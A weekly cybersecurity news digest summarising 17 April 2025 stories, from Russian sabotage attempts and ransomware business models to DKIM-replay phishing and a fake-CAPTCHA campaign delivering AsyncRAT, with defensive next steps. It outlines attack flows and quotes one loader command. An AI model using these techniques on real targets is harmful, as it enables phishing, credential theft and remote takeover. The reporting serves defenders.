17 Cyber Security News Worth Your Attention This Week

We scour more than 15 cybersecurity news portals every week to surface only the stories worth your attention. This week was a busy one — from Russia’s foiled cyber-sabotage in the Netherlands to Google’s surprise U-turn on third-party-cookie prompts and rollout of IP Protection.

1. Russia Attempting Cyber Sabotage Attacks Against Dutch Critical Infrastructure

Context: Dutch military intelligence (MIVD) says it thwarted the first confirmed Russian cyber‑sabotage attempt on a Dutch public service and uncovered a separate operation against critical infrastructure that appeared to be reconnaissance for future sabotage.

Key Details

• No disruption occurred; the public‑service target was not named. The second operation aimed to pre‑position inside OT networks that power ports and energy sites.

• Activity mirrors Moscow’s broader hybrid campaign against NATO logistics hubs.

Read more: https://therecord.media/dutch-mivd-report-russian-cyber-sabotage

2. British Retailer M&S Confirms Being Hit by ‘Cyber Incident’ Amid Store Delays

Context: Marks & Spencer disclosed a cyber‑attack that from 21  April  2025 disrupted Click‑and‑Collect and contactless payments nationwide. Although some systems were impacted and down, this is actually a pretty good example of a system that is resillient to attacks.

Key Details

• Card terminals and some card systems failed intermittently, forcing staff to switch to manual checkout flows.
• External IR firms and the UK NCSC are assisting; no evidence yet of customer‑data compromise.

Next Steps

• If you process M&S loyalty data, enable credential‑stuffing monitoring.

Read more: https://therecord.media/british-retailer-MS-confirms-cyber-incident-store-delays

3. Ransomware Groups Test New Business Models to Hit More Victims, Increase Profits

Context: Secureworks observed DragonForce and Anubis rolling out franchise‑style RaaS (Ransomware as a Service) offerings after the LockBit takedown.

One-click locker builders, white-label leak-site hosting and even VOIP “pressure-call” services mean low-skill crooks can start extorting immediately, driving attacks toward SMBs.

Key Details

• Menu now includes encryption‑plus‑leak, leak‑only extortion, and pure access resale to other gangs.
• Revenue splits vary (e.g., 70/30 for encryption, 90/10 for raw access resale), broadening appeal to low‑skill crooks.

Next Steps

• Stress-test insurance & IR playbooks: confirm policies cover leak-only extortion and rehearse response plans that start with public-data disclosure, not decryption.

Read more: https://therecord.media/ransomware-groups-test-new-business-models-dragonforce-anubis

4. Beware of Video-Call Links That Are Attempts to Steal Microsoft 365 Access, Researchers Tell NGOs

Context: Russia‑linked actors lure Ukrainian NGOs to fake video‑call portals that harvest OAuth device‑code tokens, bypassing passwords and MFA.

Key Details

• Campaign active since Feb 2025; at least 22 civil‑society groups targeted.

Next Steps

• Disable or restrict Device Code flow to trusted IP ranges.
• Train staff: real invites never require signing in on unmanaged browsers.

Read more: https://therecord.media/russia-linked-phishing-microsoft365-ukraine-ngos

5. Two Top Cyber Officials Resign From CISA

Context: Senior advisers Bob Lord and Lauren Zabierek resigned, warning of possible staff cuts and policy slowdowns.

Key Details

• Both helped launch the Secure‑by‑Design initiative; continuity now uncertain.
• Departure comes amid a federal hiring freeze that has delayed JCDC workstreams.

Read more: https://therecord.media/two-top-cyber-officials-resign-from-cisa

6. New Payment-Card Scam Involves a Phone Call, Some Malware and a Personal Tap

Context Cleafy researchers uncovered a scam in which attackers pose as your bank, talk you through installing a bogus “security” app, then persuade you to tap your contactless card to the phone—at which point Android malware “SuperCard X” skims the data in real time and empties the account.

Key Details

• Kill‑chain: SMS ➜ call‑centre ➜ sideloaded APK ➜ card tap ➜ instant drain.
• The malware is sold as a service on Telegram for about €1,200 a month, complete with dashboards for affiliates.

Next Steps

• Block sideloading via MDM; enforce Play Protect.
• Educate: banks never request card taps to phones.

Read more: https://therecord.media/new-payment-card-scam-involves-malware-tap

7. North Korean Operatives Use Deepfakes in IT Job Interviews

Context: Unit 42 shows DPRK IT workers using real‑time deepfakes to secure remote jobs and infiltrate networks.

Key Details

• Building a convincing synthetic identity takes ~70 minutes with free tools.
• One operator can interview repeatedly under different personas.

Next Steps

• Record interviews; watch for lip‑sync and lighting artifacts.
• Run document‑to‑face ID checks pre‑hire.
• Log applicant IPs/phone numbers to flag anonymizers.

Read more: https://www.darkreading.com/remote-workforce/north-korean-operatives-deepfakes-it-job-interviews

8. Kubernetes Pods Are Inheriting Too Many Permissions

Context: Dark Reading reports that default cloud‑provider IAM lets pods inherit node‑level rights, enabling lateral movement.

Key Details

• AKS, EKS, and GKE are all affected; attackers can escalate via over‑privileged service accounts.

Next Steps

• Enable GKE Workload Identity / EKS IRSA / AKS managed identities.
• Restrict RBAC; avoid wild‑card roles.
• Scan for pods running privileged or hostNetwork=true.

Read more: https://www.darkreading.com/cloud-security/kubernetes-pods-inheriting-permissions

9. Android Phones Shipped With Pre-Downloaded Malware Targeting Crypto Wallets

Context: Dark Reading cites Doctor Web: budget Android phones ship with pre‑loaded malware that steals crypto by hijacking wallet addresses.

Key Details

• At least 300 k devices sold in SE Asia carry the Trojan; it activates when popular wallet apps are installed.

Next Steps

• Advise staff to avoid off‑brand phones; use hardware wallets.
• Block registration of unknown OEM device IDs via MDM.
• Re‑flash affected phones with clean ROMs or decommission them if you really need to use them.

Read more: https://www.darkreading.com/threat-intelligence/android-pre-downloaded-malware-crypto-wallets

10. CVE Program Budget Cuts Rattle Cybersecurity Sector

Context: A proposed 40 % budget cut nearly shut down the 25-year-old CVE Program on 16 April 2025. After a loud industry backlash, CISA signed an 11-month bridge contract with MITRE and endorsed a newly formed CVE Foundation to take the project independent.

Read more: https://www.darkreading.com/vulnerabilities-threats/cve-program-cuts-cyber-sector

11. WhatsApp’s New Advanced Chat Privacy Feature to Protect Sensitive Conversations

Context: WhatsApp now lets users lock specific chats behind an extra passcode and hides previews.

Key Details

• Rollout began 24  April  2025 on Android and iOS

Next Steps

• Note: screenshots remain possible
• Update WhatsApp
• Require latest WhatsApp on BYOD via MDM if WhatsApp is used for bussiness and has internal or confidential data.

Read more: https://cybersecuritynews.com/whatsapp-advanced-chat-privacy-feature/

12. The Shadow‑AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools

Context: CyberArk survey: half of employees paste sensitive data into consumer AI tools without sign‑off.

Key Details

• 36 % admitted pasting source code; 26 % shared customer data.
• Only 22 % of orgs have formal AI‑usage policies.

Next Steps

• Draft AI‑acceptable‑use policy; block risky domains. You can download free simple ai use policy from us here.
• Offer a logged, sanctioned GPTs.

Read more: https://www.securityweek.com/the-shadow-ai-surge-study-finds-50-of-workers-use-unapproved-ai-tools/

13. Google Drops Cookie Prompt in Chrome, Adds IP Protection to Incognito

Context: Google killed the idea of a pop-up that would have asked every Chrome user to allow or block third-party cookies, but the wider cookie phase-out is only delayed (pending U.K. regulator approval), and Chrome will instead test **IP Protection**—a two-hop proxy relay (Google + Cloudflare) that hides Incognito users’ IP addresses from trackers—starting in Canary builds in May 2025, with stable release no earlier than July.

Key Details

• Decision comes after Google scrapped its new cookie-consent prompt and postponed broader cookie deprecation to avoid breaking ad-tech workflows.
• IP Protection masks users’ addresses via a double proxy run by Cloudflare and Google; enterprises can disable it and it is off by default in managed Chrome.
• Move helps satisfy EU Digital Markets Act privacy expectations without completely overhauling web-tracking economics.

Read more: https://thehackernews.com/2025/04/google-drops-cookie-prompt-in-chrome.html

14. Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials

Context: Until Google closed the loophole on 22 Apr 2025, attackers were grabbing a *legitimate* Google-signed email, replaying the same DKIM signature on a doctored message, and pointing users to credential-harvest pages hosted on Sites.google.com—so every message looked 100 % authentic to mail filters.

Read more: https://thehackernews.com/2025/04/phishers-exploit-google-sites-and-dkim.html

Key Details

• How the trick works: the gang captures a real no-reply@google.com message, swaps out the body and From-name inside a Google OAuth app, then replays the signed headers; DKIM and DMARC still pass because the signature matches the original hash.
• Why it lands: security tools trust both the DKIM signature and the sites.google.com domain hosting the fake login page, so the mail bypasses most enterprise gateways.
• Who was hit: campaigns focused on finance teams and SaaS help-desk inboxes, aiming to reuse cloud creds in BEC and payroll-diversion fraud.

15. Gartner: 85 % of CEOs now view cybersecurity as a growth driver

Context: Gartner’s 2025 CEO & Senior Executive Survey (≈ 450 global leaders) shows cybersecurity has shifted from cost centre to strategic enabler of revenue expansion and new-market entry.

Key Details

• 85 % of CEOs say robust security is *critical for business growth* and competitive differentiation.
• Risk back on the agenda: “enterprise risk” returned to CEOs’ top-10 priorities for the first time since 2017, driven by cyber-threats and regulation.
• Leadership anxiety: 45 % admit they would not feel comfortable defending a breach to the media, highlighting reputational stakes.
• AI double-edge: executives see AI as both a growth lever and a source of new attack surface, increasing demand for mature security programs.

Next Steps

• Link security KPIs to growth metrics (faster product launches, quicker market entry) when pitching budgets.

• Rehearse breach-response messaging so leaders can confidently address incidents with press and regulators.

Read more: https://cybermagazine.com/news/gartner-85-see-cybersecurity-as-critical-for-growth

16. Cyberwar in Ukraine, Year 3: Fewer wipers, more stealthy OT recon

Context: CSO Online’s April-2025 report says Russian operators have shifted from headline-grabbing wiper attacks to quieter espionage and mapping of operational-technology (OT) networks as the conflict grinds on.

Key Details

• Ukrainian defenders are now seeing **many more intrusions aimed at stealing data and charting energy-grid and transport systems** than outright destructive malware.
• CERT-UA notes that while wipers still surface, *the bulk of 2024 activity* was credential-theft and OT reconnaissance.
• Ukrainian critical-infrastructure teams report improved resilience: faster backup restore times and segmented OT help limit impact when destructive code does appear.

Read more: https://www.csoonline.com/article/3965409/the-state-of-cyberwar-in-ukraine-and-how-cisos-can-help.html

17. Booking.com phishing uses fake CAPTCHA to sneak AsyncRAT into hotel networks

Context: A global “ClickFix” campaign is impersonating Booking.com reservations. Victims are shown a bogus CAPTCHA page that triggers a PowerShell one-liner, downloading an AutoIt-wrapped **AsyncRAT** payload and handing attackers remote control.

Key Details

• Social-engineering flow: phishing email → PDF/HTML link → fake CAPTCHA → hidden PowerShell download → `AutoIt.exe -r loader.au3` launches AsyncRAT.

Read more: https://hackread.com/booking-com-phishing-scam-fake-captcha-asyncrat/